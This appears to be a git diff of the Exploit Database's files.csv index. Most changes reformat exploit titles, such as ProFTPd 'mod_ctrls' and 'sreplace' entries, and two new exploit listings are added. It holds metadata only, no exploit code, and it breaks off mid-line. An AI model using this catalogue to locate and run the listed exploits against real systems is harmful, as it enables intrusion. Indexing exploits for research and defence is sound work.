diff --git a/files.csv b/files.csv index de44bb11a..48593d927 100644 --- a/files.csv +++ b/files.csv @@ -34,8 +34,8 @@ id,file,description,date,author,platform,type,port 236,platforms/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 -241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 -244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 +241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 +244,platforms/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos,0 262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0 @@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0 -2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 +2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 @@ -1885,7 +1885,7 @@ id,file,description,date,author,platform,type,port 16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 -16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 +16129,platforms/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 @@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0 20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0 -20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 +20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0 20558,platforms/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0 @@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 -22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 +22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0 @@ -5781,7 +5781,7 @@ id,file,description,date,author,platform,type,port 381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 +394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 @@ -6066,8 +6066,8 @@ id,file,description,date,author,platform,type,port 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 -3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 -3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 +3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 +3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0 @@ -6113,7 +6113,7 @@ id,file,description,date,author,platform,type,port 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0 3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0 -3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 +3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0 3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0 @@ -6577,7 +6577,7 @@ id,file,description,date,author,platform,type,port 10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0 10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local,0 -10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0 +10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",unix,local,0 10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0 @@ -9220,6 +9220,7 @@ id,file,description,date,author,platform,type,port 42565,platforms/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local,0 42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0 42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0 +42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9245,7 +9246,7 @@ id,file,description,date,author,platform,type,port 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 -43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 +43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 @@ -9766,7 +9767,7 @@ id,file,description,date,author,platform,type,port 2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0 2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 -2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 +2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 @@ -9992,7 +9993,7 @@ id,file,description,date,author,platform,type,port 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 -4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 +4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 @@ -11413,8 +11414,8 @@ id,file,description,date,author,platform,type,port 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 -16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 -16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 +16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 +16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 @@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port 16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 -16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 +16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0 @@ -11631,7 +11632,7 @@ id,file,description,date,author,platform,type,port 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 -18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0 +18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 @@ -11871,7 +11872,7 @@ id,file,description,date,author,platform,type,port 19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 -19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 +19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 @@ -13619,7 +13620,7 @@ id,file,description,date,author,platform,type,port 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 -24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0 +24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0 24958,platforms/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000 @@ -13751,7 +13752,7 @@ id,file,description,date,author,platform,type,port 25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 -25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 +25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0 @@ -15208,7 +15209,7 @@ id,file,description,date,author,platform,type,port 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote,0 -36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 +36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,windows,remote,0 36809,platforms/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 36810,platforms/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 @@ -15252,7 +15253,7 @@ id,file,description,date,author,platform,type,port 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0 -37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0 +37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0 @@ -15694,6 +15695,7 @@ id,file,description,date,author,platform,type,port 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 +42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251 42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 @@ -27589,7 +27591,7 @@ id,file,description,date,author,platform,type,port 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0 -24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 +24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 @@ -27602,7 +27604,7 @@ id,file,description,date,author,platform,type,port 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - 